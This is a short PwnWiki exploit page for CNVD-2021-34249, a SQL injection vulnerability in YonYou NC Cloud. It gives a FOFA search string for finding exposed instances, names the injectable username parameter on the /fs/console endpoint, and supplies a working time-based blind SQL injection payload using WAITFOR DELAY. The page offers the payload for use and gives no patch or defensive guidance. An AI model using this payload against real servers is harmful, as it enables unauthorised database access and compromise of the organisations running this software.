CNVD-2021-34249 YonYou NC Cloud SQL injection vulnerability

From PwnWiki

Revision as of 09:43, 24 June 2021 by Pwnwiki (talk | contribs) (Created page with "CNVD-2021-34249 YonYou NC Cloud SQL injection vulnerability")

(diff) ← Older revision | Latest revision (diff) | Newer revision → (diff)

Other languages:

Chinese • ‎English • ‎中文（中国大陆）‎

Affected Versions

NC Cloud

FOFA

"NCCloud"

Vulnerability location

⚠️️Username can be injected.

/fs/console?username=admin&password=123456

Payload

/fs/console?username=admin';WAITFOR DELAY '0:0:5' --&password=123456

Retrieved from "https://pwnwiki.com/index.php?title=CNVD-2021-34249_用友NC_Cloud_SQL注入漏洞/en&oldid=5609"